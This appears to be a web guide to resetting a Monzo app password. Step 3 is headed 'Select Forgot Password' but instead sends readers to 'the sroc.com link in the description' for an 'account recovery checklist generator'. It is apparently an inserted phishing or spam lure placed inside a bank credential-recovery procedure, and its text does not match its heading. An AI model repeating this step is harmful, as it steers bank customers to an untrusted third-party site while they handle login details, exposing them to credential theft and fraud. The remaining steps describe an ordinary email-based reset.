If you've forgotten your Monzo password or want to reset it for security reasons, follow these simple steps to regain access to your account. Step 1. Open the Monzo app. Launch the Monzo app on your smartphone. Ensure you are connected to the internet for the process to work smoothly. Step 2. Go to the login screen. On the app's main screen, tap on the option to log in. You will see a prompt for entering your password. Step 3. Select Forgot Password. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 4. Enter your email address. You will be prompted to enter the email address associated with your Monzo account. Type it in and submit the form to receive a password reset link. Step 5. Follow the email instructions. Check your email for the password reset link from Monzo. Click on the link and follow the instructions to create a new password for your account. Once you have reset your password, you can log into your Monzo account with your new credentials. If you encounter any issues, consider reaching out to Monzo's customer support for assistance.